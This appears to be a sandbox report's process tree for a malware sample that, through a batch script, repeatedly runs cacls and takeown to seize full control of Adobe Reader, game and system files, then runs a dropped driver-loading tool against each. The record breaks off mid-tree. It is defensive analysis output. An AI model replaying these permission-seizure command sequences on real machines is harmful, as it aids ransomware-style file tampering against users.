C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:1104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵PID:392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:364 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx64.exeBtmmyzQx.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:1736 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵PID:1220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:304 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:788
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:1652 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:1972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:1636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1392 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:572
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:1648 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:1908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:632
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:1680 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1972 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1636
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:980 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:1156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:1064 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:520 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:1496 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:912 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵
- Loads dropped DLL
PID:1124 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵PID:828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "ChessMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1968 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "ChessMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1932
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵
- Loads dropped DLL
PID:1572 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:1064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵
- Loads dropped DLL
PID:1700 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:1924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "SolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:980 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "SolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1652
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵
- Loads dropped DLL
PID:1688 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:1104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵
- Loads dropped DLL
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵
- Executes dropped EXE
PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵
- Loads dropped DLL
PID:1988 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:1188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵PID:1220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "license.html" -nobanner3⤵
- Loads dropped DLL
PID:632 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "license.html" -nobanner4⤵
- Executes dropped EXE
PID:836
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵
- Loads dropped DLL
PID:1652 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:1936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵
- Modifies file permissions
PID:1408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "add_reviewer.gif" -nobanner3⤵
- Loads dropped DLL
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "add_reviewer.gif" -nobanner4⤵
- Executes dropped EXE
PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵
- Loads dropped DLL
PID:432 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:1156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "forms_received.gif" -nobanner3⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "forms_received.gif" -nobanner4⤵
- Executes dropped EXE
PID:1972
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵
- Loads dropped DLL
PID:836 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵PID:392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "reviews_super.gif" -nobanner3⤵
- Loads dropped DLL
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "reviews_super.gif" -nobanner4⤵
- Executes dropped EXE
PID:768
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵
- Loads dropped DLL
PID:1152 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "submission_history.gif" -nobanner3⤵
- Loads dropped DLL
PID:232 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "submission_history.gif" -nobanner4⤵
- Executes dropped EXE
PID:1552
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵PID:224
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵
- Loads dropped DLL
PID:1156 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵
- Loads dropped DLL
PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "Identity-H" -nobanner3⤵
- Loads dropped DLL
PID:892 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "Identity-H" -nobanner4⤵
- Executes dropped EXE
PID:1908
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵
- Loads dropped DLL
PID:1456 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:1092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵
- Modifies file permissions
PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵
- Loads dropped DLL
PID:236 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵
- Executes dropped EXE
PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵
- Loads dropped DLL
PID:1924 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵
- Modifies file permissions
PID:520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "ZY______.PFB" -nobanner3⤵
- Loads dropped DLL
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "ZY______.PFB" -nobanner4⤵
- Executes dropped EXE
PID:828
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵
- Loads dropped DLL
PID:1968 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵PID:1092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "brt32.clx" -nobanner3⤵
- Loads dropped DLL
PID:228 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "brt32.clx" -nobanner4⤵
- Executes dropped EXE
PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1060
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵
- Loads dropped DLL
PID:1124 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:1152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "usa.fca" -nobanner3⤵
- Loads dropped DLL
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "usa.fca" -nobanner4⤵
- Executes dropped EXE
PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵
- Loads dropped DLL
PID:664 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵
- Modifies file permissions
PID:1712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CROATIAN.TXT" -nobanner3⤵
- Loads dropped DLL
PID:768 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CROATIAN.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵
- Loads dropped DLL
PID:220 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:1636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CP1251.TXT" -nobanner3⤵
- Loads dropped DLL
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CP1251.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1648
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵
- Loads dropped DLL
PID:884 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "background.png" -nobanner3⤵
- Loads dropped DLL
PID:208 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "background.png" -nobanner4⤵
- Executes dropped EXE
PID:1456
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵
- Loads dropped DLL
PID:980 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:960
-
-
